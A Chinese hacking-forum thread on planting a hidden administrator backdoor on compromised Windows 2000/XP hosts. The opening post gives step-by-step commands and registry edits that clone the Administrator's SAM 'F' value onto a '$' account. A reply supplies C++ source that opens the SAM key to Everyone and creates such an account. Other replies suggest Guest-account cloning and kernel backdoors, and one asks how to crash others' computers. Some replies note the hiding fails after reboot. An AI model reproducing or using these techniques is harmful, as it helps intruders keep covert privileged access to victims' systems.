信息来源：太平洋电脑

对regedit.exe我想大家都很熟悉，但却不能对注册表的项键设置权限，而regedt32.exe最大的优点就是能够对注册表的项键设置权限。nt/2000/xp的帐户信息都在注册表的HKEY_LOCAL_MACHINE\SAM\SAM键下，但是除了系统用户SYSTEM外，其它用户都无权查看到里面的信息，因此我首先用regedt32.exe对SAM键为我设置为“完全控制”权限。这样就可以对SAM键内的信息进行读写了了。具体步聚如下：

1、假设我们是以超级用户administrator登录到开有终端服务的肉鸡上的，首先在命令行下或帐户管理器中建立一个帐户:hacker$,这里我在命令行下建立这个帐户 net user hacker$ 1234 /add

2、在开始/运行中输入:regedt32.exe并回车来运行regedt32.exe。

3、点“权限”以后会弹出窗口点添加将我登录时的帐户添加到安全栏内，这里我是以administrator的身份登录的，所以我就将administrator加入，并设置权限为“完全控制"。这里需要说明一下:最好是添加你登录的帐户或帐户所在的组，切莫修改原有的帐户或组，否则将会带来一系列不必要的问题。等隐藏超级用户建好以，再来这里将你添加的帐户删除即可。

4、再点“开始”→“运行”并输入"regedit.exe" 回车,启动注册表编辑器regedit.exe。 打开键：HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\hacker$"

5、将项hacker$、00000409、000001F4导出为hacker.reg、409.reg、1f4.reg，用记事本分别打这几个导出的文件进行编辑，将超级用户对应的项000001F4下的键"F"的值复制，并覆盖hacker$对应的项00000409下的键"F"的值,然后再将00000409.reg与hacker.reg合并。

6、在命令行下执行net user hacker$ /del将用户hacker$删除：net user hacker$ /del

7、在regedit.exe的窗口内按F5刷新，然后打文件-导入注册表文件将修改好的hacker.reg导入注册表即可

8、到此，隐藏的超级用户hacker$已经建好了，然后关闭regedit.exe。在regedt32.exe窗口内把HKEY_LOCAL_MACHINE\SAM\SAM键权限改回原来的样子（只要删除添加的帐户administrator即可）。

9、注意：隐藏的超级用户建好后，在帐户管理器看不到hacker$这个用户，在命令行用“net user”命令也看不到，但是超级用户建立以后，就不能再改密码了，如果用net user命令来改hacker$的密码的话，那么在帐户管理器中将又会看这个隐藏的超级用户了，而且不能删除。

重启后会被显示的，通过导入注册表的方法添加帐号，帐户管理器并没有刷新，所以当时看不到，重启后帐户管理里面一样可以看到。

我测试后不行，计算机管理中还是显示了“hack$”  不知道怎么回事？
不过这个方法科隆guest 可以通过！

大虾说清楚平台啊。 不是所以有平台都可以啊。 我试过了。 在XP SP2下就不行啊。 还是可以看到加了$的用户啊。
不知道是不是真的。


XP往后的系统把regedt32取消了，其实是把功能都整合到了regedit里头了。
顺便申请VIP^_^

这篇文章真的该放到讨论区批斗一把了.
隐藏用户是根本做不到的.
只是手工修改以后没法立即显示
只要一重启就可以看到了
WIN2000~XP~2003.没一个可以真正隐藏的.
帮别人查看机器的时候
很多上面入侵者自以为聪明的加上xxx$之类的.
简直是掩耳盗铃啊.

留个内核级后门  
象黑客守护者一类的.用的时候把用户 加上
不用的时候,把用户 DEL 就好 了.

大家看下我的方法怎么样  管理和CMD下都看不到
http://www.25xiaoshi.com/制作超级隐藏的帐号后门.rar  演示动画  自己发现的方法请各位批斗

2000GUEST可以！XP 2003到现在没发现个好方法！

关于增加一个隐藏帐号，
在注册表增加如下：

所以把这个[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\A$]
@=hex(1f4):


对2000和xp有效，但是重启之后，进入管理工具中无法打开用户一拦

xp中启动截面只能够用经典的登陆，即输入两次ctrl+alt+del才可以！


代码很简单，只是增加了以上的注册表健值！
xp+vs.net 2003编译通过


// creatadmin.cpp : 定义控制台应用程序的入口点。
//

#include "stdafx.h"
#include <Windows.h>
#include <Aclapi.h>


/* 在注册表sam键下面的SAM\\SAM\\Domains\\Account\\Users\\Names新加一个带"$"的用户就可以实现隐藏；在2000,xp下测试
问题：2000下重启后在计算机管理工具中的本地用户和组将无法再显示
xp的启动界面只能够由经典的登陆模式，即双击ctrl+alt+del登陆！！！*/
void _tmain(int argc, _TCHAR* argv[])
{
std::string sam = "SAM\\SAM\\Domains\\Account\\Users\\Names";
if (argc != 2)
{
printf("Welcome to Http://systest2005.52blog.net\nmail to:systest2005@126.com!");
printf("\nYou must input the name of administrators you want to create!");
printf("\nUsage:%s name",argv[0] );
printf("\n<name> must end with $");
exit(0);
}
int n = strlen(argv[1]);
if (argv[1][n-1] != &#39;$&#39;)
{
printf("The name must end with $");
exit(0);
}
char *s = argv[1];

/*以下代码为网上搜索而来，我也不知道最先的出处*/
DWORD dwRet;
LPSTR SamName = "MACHINE\\SAM\\SAM";
PSECURITY_DESCRIPTOR pSD = NULL;
PACL pOldDacl = NULL;
PACL pNewDacl = NULL;
EXPLICIT_ACCESS ea;
HKEY hKey = NULL;
HKEY mkey = NULL;

// 获取SAM主键的DACL
dwRet = GetNamedSecurityInfo(SamName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
NULL, NULL, &pOldDacl, NULL, &pSD);
if (dwRet != ERROR_SUCCESS)
{
printf("GetNamedSecurityInfo Error: %d\n", dwRet);
goto FreeAndExit;
}

// 创建一个ACE，允许Everyone完全控制对象，并允许子对象继承此权限
ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
BuildExplicitAccessWithName(&ea, "Everyone", KEY_ALL_ACCESS, SET_ACCESS,
SUB_CONTAINERS_AND_OBJECTS_INHERIT);

// 将新的ACE加入DACL
dwRet = SetEntriesInAcl(1, &ea, pOldDacl, &pNewDacl);
if (dwRet != ERROR_SUCCESS)
{
printf("SetEntriesInAcl Error: %d\n", dwRet);
goto FreeAndExit;
}

// 更新SAM主键的DACL
dwRet = SetNamedSecurityInfo(SamName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
NULL, NULL, pNewDacl, NULL);
if (dwRet != ERROR_SUCCESS)
{
printf("SetNamedSecurityInfo Error: %d\n", dwRet);
goto FreeAndExit;
}

// 打开SAM的子键
dwRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SAM\\SAM\\Domains\\Account\\Users\\names\\",
0, KEY_ALL_ACCESS, &hKey);
if (dwRet != ERROR_SUCCESS)
{
printf("Reg Open Key Error: %d\n", dwRet);
goto FreeAndExit;
}
dwRet = RegCreateKey(hKey,s,&mkey);
if (dwRet != ERROR_SUCCESS)
{
printf("Reg CreatKey Error: %d\n", dwRet);
goto FreeAndExit;
}

dwRet = RegSetValueEx(mkey,NULL,NULL,0x1f4,NULL,0);
if (dwRet != ERROR_SUCCESS)
{
printf("set Key value Error: %d\n", dwRet);
goto FreeAndExit;
}
printf("create SAM Subkey Successfully.\n");
RegCloseKey(hKey);
RegCloseKey(mkey);

FreeAndExit:
if (hKey) RegCloseKey(hKey);
if (pNewDacl) LocalFree(pNewDacl);
// 还原SAM主键的DACL
if (pOldDacl) SetNamedSecurityInfo(SamName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
NULL, NULL, pOldDacl, NULL);
if (pSD) LocalFree(pSD);
return ;

}

加了$只能在dos下隐藏吧....在窗口下查看用户应该还是看的出的啊

根本做不到完全隐藏
一个稍微懂安全的网络管理员，
查隐藏帐户的时候，一定会去选择在注册表的SAM里面查的

个人认为，用被禁用的GUEST帐户登陆是一个不错的方法....当然..必须是在GUEST没有被完全删除的情况下

个人认为，用被禁用的GUEST帐户登陆是一个不错的方法

不过Guest是可以的。
先设置Guest密码
再客隆Guest
然后再在用户管理里将Guest禁止

加$符号在Administrator下DOS看管理组一样可以看到~
没办法真正隐藏的，试了N个办法了。

目前在2000里guest是完美的隐藏```
2003==还没办法！

我个人喜欢用添加 IUSR_…… 用户  有时候用Sqldebugger  Guest 等等。

引用:

下面是引用xmasfox于2005-08-02 00:13发表的:
留个内核级后门  
象黑客守护者一类的.用的时候把用户 加上
不用的时候,把用户 DEL 就好 了.

那你不累死。。每次都去找工具。。 [s:43]

请问能帮忙推荐一些攻防专家，咨询一些问题吗，非常感谢！我的邮件地址是Lhyang168@vip.sina.com ,打搅了！

用教主那个软件可以做到真正隐藏吗

真可惜　，，，　就觉得奇怪。。。。。。。

^_^..教主要工具还建个 jiaozhu$ 哈哈

我们下学期要近行对等网攻防技术比赛了，我却遇到一些问题请大家帮帮忙。
1>在进攻和防范时只开哪些端口.
2>怎么才能侵入别人的计算机,使他的系统瘫痪.
3>有什么攻击命令吗.
4>大家有没有给我的提意.


上诉前提条件是不能用软件,操作系统是widons2000server.
                     请大家多帮忙.

日死，这方法不行的。。。
还是会在计算机用户里显示

我测试后不行，计算机管理中还是显示了“hack$” 不知道怎么回事？
不过这个方法科隆guest 可以通过！

重新启动后就不行了,只是当时管用而已,个人还是喜欢把GUEST提权.